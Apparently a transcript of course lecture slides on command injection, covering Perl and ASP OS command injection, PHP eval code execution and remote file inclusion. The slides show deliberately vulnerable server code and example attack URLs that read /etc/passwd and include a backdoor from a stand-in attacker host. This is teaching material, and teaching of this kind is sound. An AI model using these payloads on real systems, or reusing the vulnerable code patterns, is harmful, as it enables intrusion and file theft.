Post on 16-Dec-2015
transcript
Outline
Today we will have Adam presenting how to attack authentications (Ch6)
Before his presentation, I will continue Command Injections (Ch9), and also I will present my recent research on how to prevent and remove injection vulnerabilities
The rest of your presentations have been scheduled. Please check the course web page and plan ahead. Let me know if you have any question.
The course website : http://soslab.nccu.edu.tw/Courses.html
Interpreted Languages
Recall that an interpreted language is one whose execution involved a runtime component that interprets the code of the language and carries out the instructions that it contains
For example, SQL, Perl, ASP, PHP, etc.
Interpreted Languages
In most applications, the code processed by the interpreter is a mix of instructions written by a programmer and data supplied by a user.
An attacker can supply crafted input that breaks out of the data context, usually by supplying some syntax that has a special significance within the grammar of the interpreted language.
Command Injection Attacks
Main problem: Incorrect or completely lack of validation of user input that results in the execution of commands on the server
We have discussed SQL injections last week. Today we will discuss OS command, Web scripting language, SOAP and SMTP injection attacks.
OS command: Injecting via Perl
Consider a Perl CGI Code that allows administrators to specify a directory and view a summary of its disk usages
#!/usr/bin/perl use strict; use CGI qw(:standard escapeHTML); print header, start_html(“”); print “<pre>”; my $command = “du -h --exclude php* /var/www/html”; $command= $command.param(“dir”); $command=`$command`; print “$command\n”; print end_html;
Injecting via Perl
“|” is used to redirect the output of a process to the input of another process
This enables multiple commands to be chained together
OS Command: Injecting via ASP
Consider an ASP code that allows administrators to view the contents of a requested log file
type the log file
cmd executes the command
<% Set oScript = Server.CreateObject(“WSCRIPT.SHELL”) Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”) szCMD = “type c:\inetpub\wwwroot\logs\“ & Request.Form(“FileName”) szTempFile = “C:\“ & oFileSys.GetTempName() Call oScript.Run (“cmd.exe /c “ & szCMD & “ > “ & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) %>
Dynamic Execution Vulnerabilities
The PHP function eval() is used to dynamically execute code that is passed to the function at runtime
Consider a search function that enables users to create stored searches:
The server side implementation: creating a mysearch variable with
the value wahh
https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh
$storedsearch = $_GET[‘storedsearch’]; eval(“$storedsearch;”);
Dynamic execution in PHP
The semicolon character can be used to batch commands together in a single parameter.
For example, to retrieve the contents of the file /etc/password, you could use either the file_get_contentsor the system command:
https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh; %20echo%20file_get_contents(‘/etc/passwd’)
https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh; %20system(‘cat%20/etc/passwd’)
File Inclusion Attacks
Consider an application that delivers different content to people in different locations
A request looks like:
The application processes as follows:
https://wahh-app.com/main.php?Country=US
$country = $_GET[‘Country’]; include( $country . ‘.php’ );
File Inclusion Attacks
If the request has been intercepted:
The sever side may include an arbitrary remote file
https://wahh-app.com/main.php?Country=http://wahh-attacker.com/backdoor
$country = $_GET[‘Country’]; include(http://wahh-attacker.com/backdoor .‘.php’ );
Quiz
What’s the main cause of injection vulnerabilities?
How to prevent injection vulnerabilities?
Let’s talk a little bit about Stranger